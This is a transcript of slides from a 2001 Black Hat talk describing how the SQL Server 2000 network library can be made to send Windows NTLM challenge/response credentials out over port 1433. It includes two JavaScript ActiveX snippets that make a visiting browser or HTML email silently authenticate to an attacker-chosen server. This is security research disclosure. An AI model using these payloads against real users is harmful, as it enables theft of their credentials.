Survey
* Your assessment is very important for improving the workof artificial intelligence, which forms the content of this project
Download FBI Identifies known vulnerabilities as entry point to massive hack
Document related concepts
Transcript
Grabbin’ Creds: Forcing SQL libs to deliver LM/NT challenge and response on the back channel… Timothy M. Mullen AnchorIS.Com, Inc. [email protected] Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 1 The Culprit: SQL2000 Super Sockets Lib • New functions in dbnetlib.dll! • Supports TCP/IP Sockets, encryption, authentication, etc. • Default library on workstations that have SQL2k client utilities installed. (MSDE as well?) Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 2 Backgrounders… • SQL 7 also supported TCP/IP sockets, but only for Mixed Mode authentication (SQL maintained its own accounts) • Integrated Authentication (NTLM Creds) needed Named Pipes • Named Pipes required 139/445 open to authenticating system. Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 3 Backgrounders… cont. • Integrated Authentication has _always_ been the recommended configuration. • 139/445 has long been blocked at the router (if not, you are a yum-yum.) • Many server-to-server apps authenticate over TCP 1433 because it is “safe” . Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 4 The Skinny • DBNETLIB now directly supports integrated authentication over standard TCP/IP sockets – default port 1433. • The LM/NTLM challenge/response pairs can now be sent out via 1433 (other other ports if changed) Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 5 The Problem • Many routers, though specifically blocking 139/445, still allow established traffic out- I.e. 1433 outbound is free to pass. • Many have 1433 explicitly open for application support, server-to-server queries, etc. Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 6 The Sting • Client side ODBC connections can specify the target server, authentication type, and the library to use. • Web sites can request client to perform ADODB recordset requests, as well as other tasks. • HTML email as well. Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 7 Somewhat Lame Example • Web site with following tag: { conn=new ActiveXObject("ADODB.Connection"); conn.ConnectionString='Provider=SQLOLEDB.1;Integrated Security=SSPI;Persist Security Info=False;Initial Catalog=pubs;Data Source=10.1.1.1;Network Library=dbnetlib'; conn.Open(); } Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 8 Example Cont… • User is presented with “This page is accessing a data source from another domain. Do you want to allow this?” dialog box. • Easily engineered around… Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 9 Not So Lame Example • Lets try this one: { ns = new ActiveXObject("SQLNS.SQLNamespace"); ns.Initialize ("Grabber", 2, "Server=10.1.1.1;Trusted_Connection=Yes;Network Library=dbnetlib.dll"); } Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 10 What’s the difference? • SQLNamespace, SQL Distribution Control, and SQL Merge control are all scriptable, and are marked _safe for scripting_ ! • Silently grab the creds for fun and profit! Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 11 Live Demo • Don’t try this at home! Professional driver on closed course. Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 12 Thanks! AnchorIS.Com HammerofGod www.anchoris.com www.hammerofgod.com Timothy M. Mullen [email protected] [email protected] Timothy Mullen, AnchorIS.Com Blackhat Vegas 2001 13
